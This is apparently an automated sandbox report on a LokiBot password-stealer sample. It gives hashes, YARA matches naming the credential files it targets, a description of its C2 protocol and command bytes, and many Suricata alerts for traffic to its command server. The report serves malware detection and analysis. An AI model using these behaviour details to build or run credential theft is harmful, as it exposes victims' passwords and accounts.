Edit tour

Windows Analysis Report
dw7h7aQwVZ.exe

Overview

General Information

Sample name:	dw7h7aQwVZ.exe renamed because original name is a hash value
Original sample name:	6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967.exe
Analysis ID:	1541963
MD5:	3fb350f4356f42b51a523b6fa8cbccf3
SHA1:	5f24115b8e734d11deea653df8b32c506c31f4b1
SHA256:	6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Lokibot

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Yara detected aPLib compressed binary

Enables debug privileges

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64_ra

dw7h7aQwVZ.exe (PID: 1240 cmdline: "C:\Users\user\Desktop\dw7h7aQwVZ.exe" MD5: 3FB350F4356F42B51A523B6FA8CBCCF3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
dw7h7aQwVZ.exe	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
dw7h7aQwVZ.exe	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
dw7h7aQwVZ.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
dw7h7aQwVZ.exe	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
dw7h7aQwVZ.exe	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
dw7h7aQwVZ.exe	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
dw7h7aQwVZ.exe	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
dw7h7aQwVZ.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1285704609.0000000000401000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.2535715612.000000000055E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T11:28:49.502269+0200	2024312	1	A Network Trojan was detected	192.168.2.18	49699	94.156.177.220	80	TCP
2024-10-25T11:28:50.635558+0200	2024312	1	A Network Trojan was detected	192.168.2.18	49700	94.156.177.220	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T11:28:48.526456+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	49699	94.156.177.220	80	TCP
2024-10-25T11:28:49.651298+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	49700	94.156.177.220	80	TCP
2024-10-25T11:28:50.712196+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	49701	94.156.177.220	80	TCP
2024-10-25T11:28:52.217576+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	49703	94.156.177.220	80	TCP
2024-10-25T11:28:53.615196+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	49704	94.156.177.220	80	TCP
2024-10-25T11:28:54.898490+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	49705	94.156.177.220	80	TCP
2024-10-25T11:28:56.017260+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	49706	94.156.177.220	80	TCP
2024-10-25T11:28:57.125135+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	49707	94.156.177.220	80	TCP
2024-10-25T11:28:58.258304+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	49708	94.156.177.220	80	TCP
2024-10-25T11:28:59.390884+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	49709	94.156.177.220	80	TCP
2024-10-25T11:29:00.530239+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	49710	94.156.177.220	80	TCP
2024-10-25T11:29:01.681309+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64167	94.156.177.220	80	TCP
2024-10-25T11:29:02.822243+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64168	94.156.177.220	80	TCP
2024-10-25T11:29:03.983922+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64169	94.156.177.220	80	TCP
2024-10-25T11:29:05.122017+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64170	94.156.177.220	80	TCP
2024-10-25T11:29:06.430963+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64171	94.156.177.220	80	TCP
2024-10-25T11:29:07.550024+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64172	94.156.177.220	80	TCP
2024-10-25T11:29:08.684720+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64173	94.156.177.220	80	TCP
2024-10-25T11:29:09.814451+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64174	94.156.177.220	80	TCP
2024-10-25T11:29:10.949279+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64175	94.156.177.220	80	TCP
2024-10-25T11:29:12.081936+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64176	94.156.177.220	80	TCP
2024-10-25T11:29:13.223654+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64177	94.156.177.220	80	TCP
2024-10-25T11:29:14.340855+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64178	94.156.177.220	80	TCP
2024-10-25T11:29:15.464654+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64179	94.156.177.220	80	TCP
2024-10-25T11:29:16.633739+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64180	94.156.177.220	80	TCP
2024-10-25T11:29:17.750103+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64181	94.156.177.220	80	TCP
2024-10-25T11:29:18.913135+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64182	94.156.177.220	80	TCP
2024-10-25T11:29:20.023984+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64183	94.156.177.220	80	TCP
2024-10-25T11:29:21.158391+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64184	94.156.177.220	80	TCP
2024-10-25T11:29:22.318196+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64185	94.156.177.220	80	TCP
2024-10-25T11:29:23.422578+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64186	94.156.177.220	80	TCP
2024-10-25T11:29:24.535211+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64187	94.156.177.220	80	TCP
2024-10-25T11:29:25.670775+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64188	94.156.177.220	80	TCP
2024-10-25T11:29:26.793846+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64189	94.156.177.220	80	TCP
2024-10-25T11:29:27.935220+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64190	94.156.177.220	80	TCP
2024-10-25T11:29:29.054472+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64191	94.156.177.220	80	TCP
2024-10-25T11:29:30.177026+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64192	94.156.177.220	80	TCP
2024-10-25T11:29:31.301159+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64193	94.156.177.220	80	TCP
2024-10-25T11:29:32.403178+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64194	94.156.177.220	80	TCP
2024-10-25T11:29:33.723057+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64195	94.156.177.220	80	TCP
2024-10-25T11:29:34.874543+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64196	94.156.177.220	80	TCP
2024-10-25T11:29:35.995240+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64197	94.156.177.220	80	TCP
2024-10-25T11:29:37.269058+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64198	94.156.177.220	80	TCP
2024-10-25T11:29:38.397005+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64199	94.156.177.220	80	TCP
2024-10-25T11:29:39.536926+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64201	94.156.177.220	80	TCP
2024-10-25T11:29:40.654260+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64202	94.156.177.220	80	TCP
2024-10-25T11:29:41.790844+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64203	94.156.177.220	80	TCP
2024-10-25T11:29:42.941323+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64204	94.156.177.220	80	TCP
2024-10-25T11:29:44.078643+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64206	94.156.177.220	80	TCP
2024-10-25T11:29:45.213270+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64208	94.156.177.220	80	TCP
2024-10-25T11:29:46.330109+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64209	94.156.177.220	80	TCP
2024-10-25T11:29:47.482694+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64210	94.156.177.220	80	TCP
2024-10-25T11:29:48.605816+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64211	94.156.177.220	80	TCP
2024-10-25T11:29:49.798794+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64212	94.156.177.220	80	TCP
2024-10-25T11:29:50.934440+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64213	94.156.177.220	80	TCP
2024-10-25T11:29:52.064655+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64214	94.156.177.220	80	TCP
2024-10-25T11:29:53.204009+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64215	94.156.177.220	80	TCP
2024-10-25T11:29:54.349067+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64216	94.156.177.220	80	TCP
2024-10-25T11:29:55.463755+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64217	94.156.177.220	80	TCP
2024-10-25T11:29:56.583523+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64218	94.156.177.220	80	TCP
2024-10-25T11:29:57.714329+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64219	94.156.177.220	80	TCP
2024-10-25T11:29:58.866731+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64220	94.156.177.220	80	TCP
2024-10-25T11:29:59.980749+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64221	94.156.177.220	80	TCP
2024-10-25T11:30:01.127492+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64222	94.156.177.220	80	TCP
2024-10-25T11:30:02.258244+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64223	94.156.177.220	80	TCP
2024-10-25T11:30:03.396659+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64224	94.156.177.220	80	TCP
2024-10-25T11:30:04.577592+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64225	94.156.177.220	80	TCP
2024-10-25T11:30:05.709458+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64226	94.156.177.220	80	TCP
2024-10-25T11:30:06.831907+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64227	94.156.177.220	80	TCP
2024-10-25T11:30:07.961822+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64228	94.156.177.220	80	TCP
2024-10-25T11:30:09.105260+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64229	94.156.177.220	80	TCP
2024-10-25T11:30:10.731680+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64230	94.156.177.220	80	TCP
2024-10-25T11:30:11.866553+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64231	94.156.177.220	80	TCP
2024-10-25T11:30:12.989441+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64232	94.156.177.220	80	TCP
2024-10-25T11:30:14.159631+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64233	94.156.177.220	80	TCP
2024-10-25T11:30:15.291917+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64234	94.156.177.220	80	TCP
2024-10-25T11:30:16.452907+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64235	94.156.177.220	80	TCP
2024-10-25T11:30:17.572116+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64236	94.156.177.220	80	TCP
2024-10-25T11:30:18.689593+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64237	94.156.177.220	80	TCP
2024-10-25T11:30:19.821385+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64238	94.156.177.220	80	TCP
2024-10-25T11:30:20.946553+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64239	94.156.177.220	80	TCP
2024-10-25T11:30:22.069912+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64240	94.156.177.220	80	TCP
2024-10-25T11:30:23.211887+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64241	94.156.177.220	80	TCP
2024-10-25T11:30:24.373368+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64242	94.156.177.220	80	TCP
2024-10-25T11:30:25.629029+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64243	94.156.177.220	80	TCP
2024-10-25T11:30:26.738112+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64244	94.156.177.220	80	TCP
2024-10-25T11:30:27.879604+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64245	94.156.177.220	80	TCP
2024-10-25T11:30:29.462637+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64246	94.156.177.220	80	TCP
2024-10-25T11:30:30.594455+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64247	94.156.177.220	80	TCP
2024-10-25T11:30:31.721488+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64248	94.156.177.220	80	TCP
2024-10-25T11:30:32.864200+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64249	94.156.177.220	80	TCP
2024-10-25T11:30:34.018598+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64250	94.156.177.220	80	TCP
2024-10-25T11:30:35.149886+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64251	94.156.177.220	80	TCP
2024-10-25T11:30:36.273882+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64252	94.156.177.220	80	TCP
2024-10-25T11:30:37.412674+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64253	94.156.177.220	80	TCP
2024-10-25T11:30:38.567606+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64254	94.156.177.220	80	TCP
2024-10-25T11:30:39.698213+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64255	94.156.177.220	80	TCP
2024-10-25T11:30:40.821388+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64256	94.156.177.220	80	TCP
2024-10-25T11:30:41.962121+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64257	94.156.177.220	80	TCP
2024-10-25T11:30:43.125026+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64258	94.156.177.220	80	TCP
2024-10-25T11:30:44.259225+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64259	94.156.177.220	80	TCP
2024-10-25T11:30:45.411989+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64260	94.156.177.220	80	TCP
2024-10-25T11:30:46.568424+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64261	94.156.177.220	80	TCP
2024-10-25T11:30:47.708109+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64262	94.156.177.220	80	TCP
2024-10-25T11:30:48.826402+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64263	94.156.177.220	80	TCP
2024-10-25T11:30:49.990988+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64264	94.156.177.220	80	TCP
2024-10-25T11:30:51.141273+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.18	64265	94.156.177.220	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-25T11:28:52.064008+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	49701	TCP
2024-10-25T11:28:53.215038+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	49703	TCP
2024-10-25T11:28:54.623663+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	49704	TCP
2024-10-25T11:28:55.868297+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	49705	TCP
2024-10-25T11:28:56.981230+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	49706	TCP
2024-10-25T11:28:58.101980+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	49707	TCP
2024-10-25T11:28:59.240325+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	49708	TCP
2024-10-25T11:29:00.359155+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	49709	TCP
2024-10-25T11:29:01.536965+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	49710	TCP
2024-10-25T11:29:02.652758+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64167	TCP
2024-10-25T11:29:03.808165+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64168	TCP
2024-10-25T11:29:04.952288+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64169	TCP
2024-10-25T11:29:06.265502+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64170	TCP
2024-10-25T11:29:07.392195+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64171	TCP
2024-10-25T11:29:08.526271+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64172	TCP
2024-10-25T11:29:09.662436+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64173	TCP
2024-10-25T11:29:10.782840+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64174	TCP
2024-10-25T11:29:11.918491+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64175	TCP
2024-10-25T11:29:13.071480+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64176	TCP
2024-10-25T11:29:14.188824+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64177	TCP
2024-10-25T11:29:15.295737+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64178	TCP
2024-10-25T11:29:16.469390+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64179	TCP
2024-10-25T11:29:17.588303+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64180	TCP
2024-10-25T11:29:18.752628+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64181	TCP
2024-10-25T11:29:19.876878+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64182	TCP
2024-10-25T11:29:20.991384+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64183	TCP
2024-10-25T11:29:22.151927+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64184	TCP
2024-10-25T11:29:23.272502+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64185	TCP
2024-10-25T11:29:24.380982+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64186	TCP
2024-10-25T11:29:25.515964+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64187	TCP
2024-10-25T11:29:26.648375+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64188	TCP
2024-10-25T11:29:27.768937+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64189	TCP
2024-10-25T11:29:28.892681+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64190	TCP
2024-10-25T11:29:30.008279+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64191	TCP
2024-10-25T11:29:31.146710+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64192	TCP
2024-10-25T11:29:32.248077+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64193	TCP
2024-10-25T11:29:33.558764+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64194	TCP
2024-10-25T11:29:34.714155+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64195	TCP
2024-10-25T11:29:35.833193+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64196	TCP
2024-10-25T11:29:36.971439+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64197	TCP
2024-10-25T11:29:38.236149+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64198	TCP
2024-10-25T11:29:39.381745+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64199	TCP
2024-10-25T11:29:40.491058+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64201	TCP
2024-10-25T11:29:41.627094+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64202	TCP
2024-10-25T11:29:42.779350+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64203	TCP
2024-10-25T11:29:43.917831+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64204	TCP
2024-10-25T11:29:45.056086+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64206	TCP
2024-10-25T11:29:46.167711+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64208	TCP
2024-10-25T11:29:47.324585+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64209	TCP
2024-10-25T11:29:48.446121+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64210	TCP
2024-10-25T11:29:49.631785+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64211	TCP
2024-10-25T11:29:50.766260+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64212	TCP
2024-10-25T11:29:51.905403+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64213	TCP
2024-10-25T11:29:53.048635+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64214	TCP
2024-10-25T11:29:54.186217+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64215	TCP
2024-10-25T11:29:55.308807+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64216	TCP
2024-10-25T11:29:56.415653+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64217	TCP
2024-10-25T11:29:57.549422+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64218	TCP
2024-10-25T11:29:58.695484+0200	2025483	1	A Network Trojan was detected	94.156.177.220	80	192.168.2.18	64219	TCP
